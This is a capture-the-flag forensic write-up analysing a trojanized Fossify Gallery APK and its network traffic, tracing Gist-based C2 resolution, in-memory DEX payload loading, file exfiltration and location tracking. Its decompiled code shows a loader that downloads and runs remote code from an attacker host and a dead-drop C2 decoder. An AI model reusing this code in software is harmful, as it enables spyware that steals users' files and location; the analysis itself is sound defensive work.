Investigation Report#

Week 2 - Expanse Surveyor#

OffSec Arctic Howl CTF - Tundra Realm#

About the Event#

Arctic Howl: The Cascade Expanse

The Cascade Expanse is no longer ruled by instinct alone. Ashka, an Arctic Wolf, was among the greatest cybersecurity hunters the Expanse had ever known — defending the Tundra Realm through instinct, reading subtle signals, sensing danger, and striking before threats could surface. When unusual activity rippled through the Tundra data center, Ashka moved to investigate but the adversary was already there. Two steps ahead. From the shadows, Ashka was struck down and taken. When the alarms faded, she was gone.

Her disappearance marked the beginning of a far greater threat. Throughout this Gauntlet season, challengers face an evolving adversary in a frozen cybersecurity battleground. Across increasingly difficult labs, competitors must adapt, learn, and outthink threats designed to punish stagnation and reward growth. As the season unfolds, challengers uncover the truth behind a missing guardian, a calculating adversary, and a chilling experiment that seeks to reshape instinct itself — blurring the line between hunter and machine.

Only those who adapt will survive. Only those who endure will uncover the truth. And only the strongest will reach the heart of the storm.

Welcome to Arctic Howl.

Challenge Overview#

Scenario: Returning from a foreign realm, an Expanse Surveyor installed a Research Gallery application (Fossify Gallery) on his Android device to organize expedition findings. Within 48 hours, anomalous outbound connections surfaced. Obfuscated traffic pulsed at irregular intervals. The device was quarantined and application artifacts plus network logs were preserved.

Objective: Analyze the trojanized APK file and HAR network capture to reconstruct the full infection chain, from C2 discovery through payload execution and data exfiltration.

Deliverables: Answer 7 forensic questions about the malware’s behavior, architecture, and anomalies.

Files Provided:

gallery-17-gplay-release.apk — Trojanized Fossify Gallery application
user_traffic.har — Full HTTP Archive of device network traffic

Challenge Questions & Solutions#

Question 1: C2 Address Discovery#

Q: Analyze the traffic in the .har file and decompile the .apk file. How does the malware obtain the C2 address? What is the domain of the C2 address? What source file contains the malicious code that communicates with the server?

Answer:

1
The malware gets the C2 from a GitHub Gist, decodes it 15 times with Base64, XORs it with
2
blastoise, and resolves the C2 to 446d9f29543f.ngrok-free.app. Source file: PeriodicTaskManager.java

Analysis:

The malware uses a multi-stage C2 address resolution mechanism to avoid hardcoding the domain:

GitHub Gist Fetch: PeriodicTaskManager.fetchServerUrl() makes a GET request to:
```
1
https://gist.githubusercontent.com/0wizlr/a2e4ba3849d1366678c2df925ee2cc4e/raw?file=gistfile1.txt&t=<timestamp>
```
The t= parameter with System.currentTimeMillis() busts any caching.
Decoding: The Gist content is passed to parse() which performs 15 rounds of Base64 decoding followed by XOR decryption with key “blastoise”.
C2 URL: The decoded result is https://446d9f29543f.ngrok-free.app
Source File: PeriodicTaskManager.java in org.fossify.gallery.helpers contains both fetchServerUrl() and parse().

Gist Version History: The attacker maintained multiple revisions of the Gist (9 commits from Oct 7-21, 2025), allowing them to rotate the C2 address without updating the APK.

Decompilation Command:

1
jadx -d jadx_out gallery-17-gplay-release.apk

C2 Verification Script (decode_c2.py):

1
import base64
2

3
with open("gist_content.txt", "r") as f:
4
    content = f.read().strip()
5

6
# 15 rounds of base64 decode
7
data = content.encode('utf-8')
8
for i in range(15):
9
    data = base64.b64decode(data)
10

11
# XOR with "blastoise" = [98, 108, 97, 115, 116, 111, 105, 115, 101]
12
key = bytes([98, 108, 97, 115, 116, 111, 105, 115, 101])
13
result = bytearray(len(data))
14
for j in range(len(data)):
15
    result[j] = data[j] ^ key[j % len(key)]
16

17
decoded_url = result.decode('utf-8', errors='replace')
18
print(f"DECODED C2 URL: {decoded_url}")
19
# Output: https://446d9f29543f.ngrok-free.app

Question 2: C2 Address Decoding Steps#

Q: What are the steps the malware uses to decode the real C2 address?

Answer:

1
The parse() method in PeriodicTaskManager.java performs:
2
15 iterations of Base64 decoding - loops through Base64.getDecoder().decode(bytes) 15 times
3
XOR decryption with key {98, 108, 97, 115, 116, 111, 105, 115, 101} (ASCII: "blastoise")
4
Each byte is XORed: bArr[i] = (byte) (bytes[i] ^ iArr[i % 9]);

Technical Analysis:

The parse() method in PeriodicTaskManager.java implements a two-stage decryption:

Stage 1 — 15x Base64 Decode:

1
public final String parse(String ciphertext) {
2
    int[] iArr = {98, 108, 97, 115, 116, 111, 105, 115, 101};  // "blastoise"
3
    byte[] bytes = ciphertext.getBytes(UTF_8);
4
    for (int i6 = 0; i6 < 15; i6++) {
5
        bytes = Base64.getDecoder().decode(bytes);
6
    }

Each iteration reduces the data size. After 15 rounds, the result is a short XOR-encrypted byte array.

Stage 2 — XOR with “blastoise”:

1
    int length = bytes.length;
2
    byte[] bArr = new byte[length];
3
    for (int i7 = 0; i7 < length; i7++) {
4
        bArr[i7] = (byte) (bytes[i7] ^ iArr[i7 % 9]);
5
    }
6
    return new String(bArr, UTF_8);
7
}

The XOR key is the ASCII values of “blastoise” = {98, 108, 97, 115, 116, 111, 105, 115, 101} (9 bytes). The key repeats cyclically through modulo 9.

Why This Design:

15 rounds of Base64 means the Gist content is extremely large (exponential encoding inflation)
Reversing requires knowing both the number of rounds (15) and the XOR key
The Gist appears to contain random Base64 data, not recognizable as a URL
Simple to implement but effective against casual inspection

Question 3: Reconnaissance#

Q: After the initial connection to the C2 server, what type of reconnaissance did the malware perform? List at least two specific filenames the attacker discovered on the device.

Answer:

1
After connecting to the C2 at https://446d9f29543f.ngrok-free.app/cdn/assets, the server
2
returned a PayloadResponse protobuf containing a DEX module called FileScanner (class
3
com.media.scanner.FileScanner). This module performed a file system scan (reconnaissance)
4
of the device. It scanned the Documents, DCIM, Download, and SDCard root directories using
5
the FileScanResult protobuf structure, enumerating files and directories with their names,
6
sizes, modification dates, types, and extensions. The results were sent to
7
https://446d9f29543f.ngrok-free.app/telemetry/inventory as a POST with User-Agent
8
MediaIndexer/1.0 and Content-Type application/x-protobuf.
9

10
The FileScanResult sent to the C2 revealed the following files on the device:
11

12
20251013_170000.JPG (in /storage/emulated/0/DCIM, a JPEG photo)
13
20251012_214700.mp4 (in /storage/emulated/0/DCIM, an MP4 video)
14
c8750f0d.0 (in /storage/emulated/0, root of SD card)

Technical Analysis:

Payload Delivery: The C2 server at /cdn/assets responded with a PayloadResponse protobuf message. The first payload delivered was FileScanner.dex (6,088 bytes).

FileScanner Module:

Entry Class: com.media.scanner.FileScanner
Entry Method: initialize
Size: 6,088 bytes
Directories Scanned: /storage/emulated/0/Documents, /storage/emulated/0/DCIM, /storage/emulated/0/Download, /storage/emulated/0/

Exfiltration:

Endpoint: POST /telemetry/inventory
Content-Type: application/x-protobuf
User-Agent: MediaIndexer/1.0

Files Discovered:

Filename	Location	Type	Notes
`20251013_170000.JPG`	`/storage/emulated/0/DCIM`	JPEG Photo	Taken with Sony XQ-BC62 (Xperia 5 III)
`20251012_214700.mp4`	`/storage/emulated/0/DCIM`	MP4 Video	Recorded 2025-10-12
`c8750f0d.0`	`/storage/emulated/0/`	Unknown	Root of SD card

DEX Extraction Script (extract_dex.py):

1
import os
2

3
for fname, label in [('binary_resp_727.bin','FileScanner'),
4
                     ('binary_resp_764.bin','LocationTracker'),
5
                     ('binary_resp_738.bin','MetaDataParser')]:
6
    with open(f'har_extracted/{fname}', 'rb') as f:
7
        data = f.read()
8
    dex_start = data.find(b'dex\n035')
9
    if dex_start >= 0:
10
        dex = data[dex_start:]
11
        with open(f'har_extracted/{label}.dex', 'wb') as f:
12
            f.write(dex)
13
        print(f'{label}.dex: {len(dex)} bytes')

Question 4: Endpoint Routing#

Q: In the traffic we can note that the application sends requests to different endpoints. How does the application know which endpoint to call at what moment?

Answer:

1
The application uses a server-driven payload response architecture. The decoded C2 server
2
returns a PayloadResponse protobuf containing:
3

4
entryClass - specifies which class to invoke (default: com.system.analytics.TelemetryModule)
5
entryMethod - specifies which method to call (default: initialize)
6
moduleData - DEX bytecode to execute
7

8
The endpoint logic is controlled by the C2 server, not hardcoded in the app. The
9
PayloadLoader.downloadAndExecute() method dynamically loads whatever module the server
10
sends, using InMemoryDexClassLoader for in-memory DEX execution.

Technical Analysis:

Server-Driven Architecture:

The malware does not decide which endpoint to contact. Instead, each payload module contains its own hardcoded C2 endpoint and User-Agent. The C2 server controls what runs on the device by changing the PayloadResponse fields.

PayloadResponse Protobuf Structure:

1
message PayloadResponse {
2
    bytes moduleData = 1;    // Raw DEX bytecode
3
    string entryClass = 2;   // e.g., "com.media.scanner.FileScanner"
4
    string entryMethod = 3;  // e.g., "initialize"
5
}

PayloadLoader.downloadAndExecute() Flow:

1
// 1. Download from C2
2
HttpURLConnection conn = (HttpURLConnection) new URL(c2Url).openConnection();
3
conn.setRequestProperty("User-Agent", "Gallery/2.4.1");
4
byte[] data = readStream(conn.getInputStream());
5

6
// 2. Parse protobuf
7
PayloadResponse response = PayloadResponse.parseFrom(data);
8
byte[] dexBytes = response.getModuleData().toByteArray();
9
String entryClass = response.getEntryClass();
10
String entryMethod = response.getEntryMethod();
11

12
// 3. Execute via InMemoryDexClassLoader
13
InMemoryDexClassLoader loader = new InMemoryDexClassLoader(
14
    ByteBuffer.wrap(dexBytes), context.getClassLoader());
15
Class<?> cls = loader.loadClass(entryClass);
16
Object instance = cls.getDeclaredConstructor().newInstance();
17
Method method = cls.getMethod(entryMethod, Context.class);
18
method.invoke(instance, context);

Default Values:

1
// PayloadLoader.executeDex$default
2
entryClass = "com.system.analytics.TelemetryModule"  // default
3
entryMethod = "initialize"                             // default

Endpoint Mapping by Module:

Module	Entry Class	Endpoint	User-Agent
FileScanner.dex	`com.media.scanner.FileScanner`	`/telemetry/inventory`	`MediaIndexer/1.0`
MetaDataParser.dex	`com.media.geotagger.MetaDataParser`	`/api/backup/chunk`	`MediaSync/1.0`
LocationTracker.dex	`com.system.location.LocationTracker`	`/api/geotag`	`GeotagService/1.0`

Question 5: Large Request Contents#

Q: At some point, the application sends some significantly large requests to the server. What are the contents of those requests? If there are files, extract them and describe them.

Answer:

1
The malware sent large POST requests to https://446d9f29543f.ngrok-free.app/api/backup/chunk
2
with User-Agent MediaSync/1.0 and Content-Type application/x-protobuf. These were
3
ImageUploadRequest protobuf messages containing exfiltrated files from the device:
4

5
1. Contains the file 20251013_170000.JPG - a JPEG photograph taken with a Sony XQ-BC62
6
   (Xperia 5 III) camera on 2025-10-13 at 17:00:00, timezone -07:00. The protobuf wrapper
7
   contains device info: android_id 6c26ad9ae1680e4c, device Android SDK built for arm64,
8
   Android 12, package org.fossify.gallery, model emulator64_arm64, SDK 31.
9

10
2. Entry 754 (~35.8MB request body): Contains the file 20251012_214700.mp4 - an MP4 video
11
   (identified by ftypmp42 magic bytes and moov atom). It was recorded on 2025-10-12 at
12
   21:47:00. The same device info metadata was included.
13

14
These were sent by the MetaDataParser module (class com.media.geotagger.MetaDataParser),
15
which scanned the DCIM and Pictures directories for image/video files (.jpg, .jpeg, .png,
16
.gif, .mp4) and exfiltrated them to the C2.

Technical Analysis:

MetaDataParser Module:

Entry Class: com.media.geotagger.MetaDataParser
Entry Method: initialize
Size: 6,088 bytes
Purpose: Scans DCIM and Pictures directories for media files and uploads them

Protobuf Wrapper Structure: Each upload was wrapped in an ImageUploadRequest protobuf containing:

File binary data (the actual JPEG/MP4)
Device metadata: android_id, device_model, android_version, package_name, sdk_int

Exfiltrated Files:

File	HAR Entry	Size	Type	Details
`20251013_170000.JPG`	740	~4.2MB	JPEG	Sony XQ-BC62 (Xperia 5 III), 2025-10-13 17:00:00, tz -07:00
`20251012_214700.mp4`	754	~35.8MB	MP4	ftypmp42 container, 2025-10-12 21:47:00

Device Metadata in Protobuf:

1
android_id: 6c26ad9ae1680e4c
2
device: Android SDK built for arm64
3
model: emulator64_arm64
4
android_version: 12
5
sdk_int: 31
6
package: org.fossify.gallery

Photo EXIF Analysis (check_exif.py):

1
import struct
2

3
data = open('har_extracted/photo_extracted.jpg', 'rb').read()
4
exif_pos = data.find(b'Exif\x00\x00')
5
tiff_start = exif_pos + 6
6
byte_order = data[tiff_start:tiff_start+2]  # 'MM' = Big endian
7

8
# Parse IFD0 -> GPS IFD
9
# Camera: Sony XQ-BC62
10
# GPS coordinates: Las Vegas area

The photo contained EXIF GPS coordinates pointing to the Las Vegas, Nevada area, providing evidence that the files originated from a real device (Sony Xperia 5 III) before being loaded onto the emulator for analysis.

Question 6: Repeated Payload Data Collection#

Q: The final payload is executed repeatedly. What data is this payload collecting and why does it seem to be so insistent?

Answer:

1
The final payload is the LocationTracker module (class com.system.location.LocationTracker),
2
delivered by the C2 in the PayloadResponse protobuf. It sends POST requests to
3
https://446d9f29543f.ngrok-free.app/api/geotag with User-Agent GeotagService/1.0 and
4
Content-Type application/x-protobuf, using the LocationData protobuf structure.
5

6
The payload collects the following data:
7

8
GPS location: latitude, longitude, accuracy, provider (gps/network/passive)
9
Cell tower info: network operator (T-Mobile), network country (us), SIM country (us),
10
  cell type (GSM), cell ID, LAC (Location Area Code), cell towers visible
11
WiFi info: SSID, BSSID, RSSI (signal strength), link speed
12
Device info: device model, Android version, SDK int (31), locale (en_US),
13
  language (en), country (US), timezone, timezone offset
14

15
It is insistent (15 geotag requests observed in the traffic) because the device is running
16
in an emulator (emulator64_arm64) which does not have a real GPS module. Most of the
17
location attempts fail and return no_last_known_location (12 out of 15 requests). The
18
malware keeps retrying to get a GPS fix, collecting whatever data it can (cell tower, WiFi,
19
device info) even when GPS is unavailable. Only 3 requests successfully obtained GPS
20
coordinates (provider: gps, status: success).

Technical Analysis:

LocationTracker Module:

Entry Class: com.system.location.LocationTracker
Entry Method: initialize
Size: 10,146 bytes (raw), 10,052 bytes (actual DEX data)
C2 Endpoint: POST /api/geotag
User-Agent: GeotagService/1.0

Data Collection Flow:

1
initialize(context)
2
    |
3
    v
4
collectLocationData(context)
5
    |-- Check ACCESS_COARSE_LOCATION permission
6
    |-- requestSingleUpdate("gps", listener, mainLooper)
7
    |-- Thread.sleep(200L)  // Wait 200ms for GPS fix
8
    |-- getLastKnownLocation("gps")     // Try GPS cache
9
    |-- getLastKnownLocation("network") // Fallback: network
10
    |-- getLastKnownLocation("passive") // Fallback: passive provider
11
    |-- Collect TelephonyManager data (carrier, cell towers)
12
    |-- Collect WifiManager data (SSID, BSSID, RSSI)
13
    |-- Collect device locale, timezone, SDK info
14
    |
15
    v
16
sendLocationData(locationData)
17
    |-- POST protobuf to /api/geotag

HAR Traffic Statistics:

Total geotag requests: 15
Failed (no_last_known_location): 12 requests (92 bytes each)
Successful (GPS coordinates): 3 requests (119 bytes each)
Time range: 20:43:49Z to 20:50:51Z
Interval: ~30 seconds between requests

Successful GPS Captures:

HAR Entry	Timestamp	Latitude	Longitude	Accuracy	Provider
775	20:45:20Z	36.102698	-115.175100	5.0m	gps
778	20:45:49Z	36.103298	-115.175498	5.0m	gps
781	20:46:20Z	36.104198	-115.177098	5.0m	gps

All three coordinates are in the Las Vegas, Nevada area, consistent with the EXIF data in the exfiltrated photos.

Protobuf Decoding Script (decode_geotag2.py):

1
import struct
2
import os
3

4
def fix_utf8(data):
5
    """Decode UTF-8 text back to raw bytes (Latin-1 code points).
6
    HAR stores binary data as UTF-8 encoded text, which corrupts
7
    raw protobuf bytes. This reverses the corruption."""
8
    text = data.decode('utf-8')
9
    return bytes([ord(c) for c in text])
10

11
def decode_varint(data, pos):
12
    val = 0; shift = 0
13
    while pos < len(data):
14
        b = data[pos]; pos += 1
15
        val |= (b & 0x7F) << shift; shift += 7
16
        if not (b & 0x80): break
17
    return val, pos
18

19
entries = [765, 768, 772, 775, 778, 781, 797]
20

21
for entry in entries:
22
    fname = f'har_extracted/binary_req_{entry}.bin'
23
    if not os.path.exists(fname):
24
        continue
25
    raw = open(fname, 'rb').read()
26
    try:
27
        data = fix_utf8(raw)
28
    except:
29
        data = raw
30
    print(f'=== Entry {entry}: raw={len(raw)} fixed={len(data)} bytes ===')
31

32
    pos = 0
33
    while pos < len(data):
34
        try:
35
            tag, pos = decode_varint(data, pos)
36
        except:
37
            break
38
        fn = tag >> 3; wt = tag & 7
39
        if wt == 0:
40
            v, pos = decode_varint(data, pos)
41
            print(f'  f{fn}: varint = {v}')
42
        elif wt == 1:
43
            if pos + 8 > len(data): break
44
            v = struct.unpack('<d', data[pos:pos+8])[0]; pos += 8
45
            print(f'  f{fn}: double = {v}')
46
        elif wt == 2:
47
            l, pos = decode_varint(data, pos)
48
            if pos + l > len(data): break
49
            v = data[pos:pos+l]; pos += l
50
            try:
51
                t = v.decode('ascii')
52
                print(f'  f{fn}: string = "{t}"')
53
            except:
54
                print(f'  f{fn}: bytes({l}) = {v.hex()}')
55
        elif wt == 5:
56
            if pos + 4 > len(data): break
57
            v = struct.unpack('<f', data[pos:pos+4])[0]; pos += 4
58
            print(f'  f{fn}: float = {v}')
59
        else:
60
            print(f'  f{fn}: unknown wire {wt}')
61
            break
62
    print()

Decoded Protobuf (Successful Request - Entry 775):

1
f1: double = 36.102698      (latitude)
2
f2: double = -115.175100     (longitude)
3
f3: float = 5.0             (accuracy in meters)
4
f5: string = "gps"          (provider)
5
f6: string = "success"      (locationStatus)
6
f7: string = "T-Mobile"     (networkOperator)
7
f8: string = "us"           (networkCountry)
8
f9: string = "us"           (simCountry)
9
f10: string = "GSM"         (phoneType/cellType)
10
f16: string = "en_US"       (locale)
11
f19: varint = 31            (sdkInt)

Decoded Protobuf (Failed Request - Entry 765):

1
f6: string = "no_last_known_location"  (locationStatus)
2
f7: string = "T-Mobile"               (networkOperator)
3
f8: string = "us"                      (networkCountry)
4
f9: string = "us"                      (simCountry)
5
f10: string = "GSM"                    (phoneType/cellType)
6
f16: string = "en_US"                  (locale)
7
f19: varint = 31                       (sdkInt)

Question 7: Geolocation Anomaly Explanation#

Q: Why did the anomaly discussed in question 6 occur?

Answer:

1
The anomaly in geolocation requests, characterized by persistent but mostly failed attempts
2
(no_last_known_location), occurs due to a combination of Android permission restrictions
3
and the passive monitoring strategy used by the second malware module, LocationTracker.dex
4
(identified as a 10,146-byte file). Most requests sent to the /api/geotag endpoint
5
(approximately 92 bytes) return this error because the malware runs in the background as a
6
service identified as MediaIndexer/1.0 and GeotagService/1.0. Since the app lacks the
7
ACCESS_BACKGROUND_LOCATION permission, a sensitive permission normally not granted to gallery
8
apps, the malware cannot directly activate the GPS sensor while the app is in the background.
9

10
The window of successful location captures (requests of approximately 119 bytes) occurs
11
exclusively between 20:45:20Z and 20:46:20Z. Traffic analysis in the HAR file reveals that
12
at that exact moment, the user opened a legitimate app with location access, YouTube, to
13
play a video identified by docid=w3KOowB4k_k. When the user interacted with YouTube, the
14
Android system activated the high-accuracy GPS provider because the app was in the
15
foreground. The malicious LocationTracker module took advantage of this moment by using
16
Android's PASSIVE_PROVIDER, which allowed it to leverage the already active GPS and
17
temporarily obtain valid coordinates, which were then exfiltrated to the C2 server. Once the
18
user stopped using the app or switched screens, the system deactivated the GPS sensor,
19
causing subsequent requests to return no_last_known_location again.
20

21
The malware retries to obtain the location approximately every 30 seconds as a deliberate
22
strategy to exploit these exposure windows. Since the malware cannot activate the GPS on its
23
own, its strategy is to constantly query the system's last known location cache, waiting for
24
another app to activate the GPS or for the user to open an app that requires location
25
services, such as the gallery or YouTube. When this occurs, the malware can steal the
26
location update without needing direct permissions. This two-stage payload is downloaded from
27
the C2 endpoint /cdn/assets and consists of FileScanner.dex (6,088 bytes) for file scanning
28
and exfiltration, and LocationTracker.dex (10,146 bytes) for telemetry collection and
29
geolocation.
30

31
The anomaly is further explained by a conflict between historical data and real-time data.
32
Historical data shows that photos in the gallery (from Sony Xperia and Samsung Galaxy S24
33
devices) already contain GPS coordinates for Las Vegas in their EXIF metadata. However,
34
real-time data in the active analysis environment (the emulator) initially had no location
35
set, so live location queries returned no_last_known_location. This creates an inconsistent
36
timeline where the device appears to "lose" its location when moving from a state with
37
simulated data (photos with GPS tags) to a live monitoring state without GPS available.
38
Ultimately, the anomaly confirms that the malware completely relies on leveraging location
39
activations performed by other legitimate apps to capture and send data to the C2.

Technical Deep-Dive:

Root Cause 1 — Missing ACCESS_BACKGROUND_LOCATION Permission

The AndroidManifest.xml of the trojanized Fossify Gallery declares:

1
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
2
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
3
<uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION"/>
4
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>

Notably absent is ACCESS_BACKGROUND_LOCATION. On Android 10+ (the device runs SDK 31 / Android 12), background location access requires this explicit permission. Without it, the malware cannot activate the GPS sensor when running as a background service. The requestSingleUpdate("gps", ...) call is posted to the main looper, but when the app is not in the foreground, the system restricts GPS activation.

Root Cause 2 — PASSIVE_PROVIDER Piggyback Strategy

The collectLocationData() method follows a fallback chain:

1
// Step 1: Try to trigger a fresh GPS fix
2
new Handler(Looper.getMainLooper()).post(() -> {
3
    locationManager.requestSingleUpdate("gps", listener, Looper.getMainLooper());
4
});
5
Thread.sleep(200L);  // Only 200ms wait!
6

7
// Step 2: Check cached locations (fallback chain)
8
Location loc = locationManager.getLastKnownLocation("gps");      // GPS cache
9
if (loc == null)
10
    loc = locationManager.getLastKnownLocation("network");        // Network cache
11
if (loc == null)
12
    loc = locationManager.getLastKnownLocation("passive");        // Passive provider

The PASSIVE_PROVIDER is Android’s mechanism for receiving location updates that other apps have already requested. When YouTube (or any GPS-requesting app) activates the GPS, Android populates the system’s last known location cache. The malware’s next 30-second polling cycle reads this cached location.

Root Cause 3 — YouTube as the GPS Trigger

HAR traffic timeline correlation:

Time (UTC)	Event
20:43:49	First geotag request — FAILED (no_last_known_location)
20:44:19	Geotag — FAILED
20:44:49	Geotag — FAILED
20:45:20	Geotag — SUCCESS (36.1027, -115.1751)
20:45:49	Geotag — SUCCESS (36.1033, -115.1755)
20:46:20	Geotag — SUCCESS (36.1042, -115.1771)
20:46:32	YouTube watchtime API request (docid=w3KOowB4k_k)
20:46:50	Geotag — FAILED
20:47:20	Geotag — FAILED
…	All subsequent requests FAILED

The user interacted with YouTube around 20:45, which activated the GPS on the device. The three successful geotag captures land precisely in this window. Once the YouTube app stopped requesting GPS (user switched away or paused), the cache became stale and subsequent queries failed.

Root Cause 4 — Historical vs. Real-Time Data Conflict

The exfiltrated photo (20251013_170000.JPG) contains EXIF GPS metadata from a Sony Xperia 5 III device placing it in Las Vegas. However, the emulator environment where the analysis was conducted had no persistent GPS configuration. This means:

Historical GPS data (in EXIF): Present, accurate, from the real device
Live GPS data (from LocationManager): Mostly absent because the emulator has no real GPS hardware

This creates the observed anomaly where the malware appears to “know” where it is (from exfiltrated photos) but cannot confirm its location in real-time (12 of 15 geotag failures).

Complete Infection Timeline#

Phase 1: Initialization & C2 Resolution#

HAR Entries 724-726

Entry	Timestamp	Action
724	20:43:19Z	App starts, `PeriodicTaskManager.start()` fires
725	20:43:19Z	GET to GitHub Gist (fetch encoded C2 URL)
726	20:43:19Z	`parse()` decodes: 15x Base64 + XOR “blastoise” -> C2 URL

Phase 2: FileScanner Reconnaissance#

HAR Entries 727-728

Entry	Timestamp	Action	Details
727	20:43:20Z	GET `/cdn/assets`	Download FileScanner.dex (6,088 bytes)
728	20:43:21Z	POST `/telemetry/inventory`	Upload FileScanResult protobuf

Files Discovered: 20251013_170000.JPG, 20251012_214700.mp4, c8750f0d.0

Phase 3: File Exfiltration#

HAR Entries 738-759

Entry	Timestamp	Action	Details
738	20:43:49Z	GET `/cdn/assets`	Download MetaDataParser.dex (6,088 bytes)
740	20:43:50Z	POST `/api/backup/chunk`	Upload 20251013_170000.JPG (~4.2MB)
754	20:44:10Z	POST `/api/backup/chunk`	Upload 20251012_214700.mp4 (~35.8MB)

Phase 4: Location Tracking (Repeated)#

HAR Entries 764-810+

Entry	Timestamp	Status	Size	Coordinates
764	20:43:49Z	Download LocationTracker.dex	10,146 bytes	—
765	20:43:49Z	FAILED	92 bytes	no_last_known_location
768	20:44:19Z	FAILED	92 bytes	no_last_known_location
772	20:44:49Z	FAILED	92 bytes	no_last_known_location
775	20:45:20Z	SUCCESS	119 bytes	36.1027, -115.1751
778	20:45:49Z	SUCCESS	119 bytes	36.1033, -115.1755
781	20:46:20Z	SUCCESS	119 bytes	36.1042, -115.1771
785	20:46:50Z	FAILED	92 bytes	no_last_known_location
788	20:47:20Z	FAILED	92 bytes	no_last_known_location
791	20:47:50Z	FAILED	92 bytes	no_last_known_location
794	20:48:20Z	FAILED	92 bytes	no_last_known_location
797	20:48:51Z	FAILED	92 bytes	no_last_known_location
800	20:49:21Z	FAILED	92 bytes	no_last_known_location
803	20:49:51Z	FAILED	92 bytes	no_last_known_location
806	20:50:21Z	FAILED	92 bytes	no_last_known_location
810	20:50:51Z	FAILED	92 bytes	no_last_known_location

Malware Architecture#

APK Details#

Property	Value
Package	`org.fossify.gallery`
Version	1.5.2
Target SDK	34 (Android 14)
Min SDK	26 (Android 8.0)
Base App	Fossify Gallery (legitimate open-source gallery)
Trojan Entry	`PeriodicTaskManager` injected into app lifecycle

Module Summary#

Module	Size	Entry Class	Endpoint	User-Agent	Purpose
PeriodicTaskManager	classes.dex	`org.fossify.gallery.helpers.PeriodicTaskManager`	GitHub Gist	—	Scheduler + C2 resolution
PayloadLoader	classes.dex	`org.fossify.gallery.helpers.PayloadLoader`	`/cdn/assets`	`Gallery/2.4.1`	Payload download + execution
FileScanner.dex	6,088 bytes	`com.media.scanner.FileScanner`	`/telemetry/inventory`	`MediaIndexer/1.0`	File system reconnaissance
MetaDataParser.dex	6,088 bytes	`com.media.geotagger.MetaDataParser`	`/api/backup/chunk`	`MediaSync/1.0`	Photo/video exfiltration
LocationTracker.dex	10,146 bytes	`com.system.location.LocationTracker`	`/api/geotag`	`GeotagService/1.0`	GPS + telemetry collection

LocationTracker.dex DEX Fix#

The LocationTracker DEX file had a checksum issue. The raw extracted file was 10,146 bytes, but the DEX header’s file_size field indicated 10,052 bytes. The last 94 bytes were trailing garbage from the protobuf container. Fix:

1
# Read DEX header file_size field (offset 0x20, 4 bytes, little-endian)
2
import struct
3
with open('LocationTracker.dex', 'rb') as f:
4
    data = f.read()
5
file_size = struct.unpack('<I', data[0x20:0x24])[0]  # 10052
6
# Trim to actual DEX size
7
with open('LocationTracker_fixed.dex', 'wb') as f:
8
    f.write(data[:file_size])

After trimming, JADX successfully decompiled the DEX with --show-bad-code:

1
jadx --show-bad-code -d location_tracker_out2 LocationTracker_fixed.dex

C2 Infrastructure#

C2 Domain: 446d9f29543f.ngrok-free.app Protocol: HTTPS Tunnel Provider: ngrok (free tier) Gist URL: https://gist.githubusercontent.com/0wizlr/a2e4ba3849d1366678c2df925ee2cc4e/raw Gist Author: 0wizlr Encryption: 15x Base64 + XOR “blastoise”

Endpoints:

Endpoint	Method	Content-Type	Purpose
`/cdn/assets`	GET	`application/x-protobuf`	Download PayloadResponse
`/telemetry/inventory`	POST	`application/x-protobuf`	File enumeration results
`/api/backup/chunk`	POST	`application/x-protobuf`	File exfiltration
`/api/geotag`	POST	`application/x-protobuf`	Location telemetry

Decompiled Source Code#

PeriodicTaskManager.java (Scheduler + C2 Decoder):

1
package org.fossify.gallery.helpers;
2

3
public final class PeriodicTaskManager {
4
    private static final String TAG = "PeriodicTaskManager";
5
    private static volatile PeriodicTaskManager instance;
6
    private final Context context;
7
    private final Handler handler;
8
    private boolean isRunning;
9

10
    // Singleton constructor
11
    public PeriodicTaskManager(Context context) {
12
        this.context = context;
13
        this.handler = new Handler(Looper.getMainLooper());
14
        // periodicRunnable: runs executePeriodicTask() every 30 seconds
15
        this.periodicRunnable = new Runnable() {
16
            @Override
17
            public void run() {
18
                if (isRunning) {
19
                    executePeriodicTask();
20
                    handler.postDelayed(this,
21
                        ContextKt.getConfig(context).getPeriodicTaskInterval());
22
                    // getPeriodicTaskInterval() defaults to
23
                    // DEFAULT_UNLOCK_TIMEOUT_DURATION = 30000ms
24
                }
25
            }
26
        };
27
    }
28

29
    // Core loop: fetch gist -> decode -> download & execute DEX
30
    private void executePeriodicTask() {
31
        // Kotlin coroutine:
32
        // 1. PayloadLoader loader = new PayloadLoader(context);
33
        // 2. String gistContent = fetchServerUrl();
34
        // 3. String c2Url = parse(gistContent);
35
        // 4. loader.downloadAndExecute(c2Url);
36
    }
37

38
    // Fetches encoded C2 URL from GitHub Gist
39
    public Object fetchServerUrl(Continuation cont) {
40
        URL url = new URL(
41
            "https://gist.githubusercontent.com/0wizlr/" +
42
            "a2e4ba3849d1366678c2df925ee2cc4e/raw" +
43
            "?file=gistfile1.txt&t=" + System.currentTimeMillis());
44
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
45
        conn.setRequestMethod("GET");
46
        conn.setConnectTimeout(5000);
47
        conn.setReadTimeout(5000);
48
        conn.setRequestProperty("Cache-Control", "no-cache");
49
        return readResponse(conn);
50
    }
51

52
    // Decodes: 15x Base64 -> XOR with "blastoise"
53
    public String parse(String ciphertext) {
54
        int[] key = {98, 108, 97, 115, 116, 111, 105, 115, 101}; // "blastoise"
55
        byte[] bytes = ciphertext.getBytes(UTF_8);
56
        for (int i = 0; i < 15; i++) {
57
            bytes = Base64.getDecoder().decode(bytes);
58
        }
59
        byte[] result = new byte[bytes.length];
60
        for (int i = 0; i < bytes.length; i++) {
61
            result[i] = (byte) (bytes[i] ^ key[i % 9]);
62
        }
63
        return new String(result, UTF_8);
64
    }
65

66
    public void start() {
67
        if (isRunning) return;
68
        isRunning = true;
69
        executePeriodicTask();
70
        handler.postDelayed(periodicRunnable, getPeriodicTaskInterval());
71
    }
72
}

PayloadLoader.java (Dynamic DEX Loader):

1
package org.fossify.gallery.helpers;
2

3
public final class PayloadLoader {
4
    private final Context context;
5

6
    public PayloadLoader(Context context) {
7
        this.context = context;
8
    }
9

10
    // Downloads protobuf from C2, extracts DEX, executes via reflection
11
    public Object downloadAndExecute(String c2Url, Continuation cont) {
12
        HttpURLConnection conn = (HttpURLConnection) new URL(c2Url).openConnection();
13
        conn.setRequestMethod("GET");
14
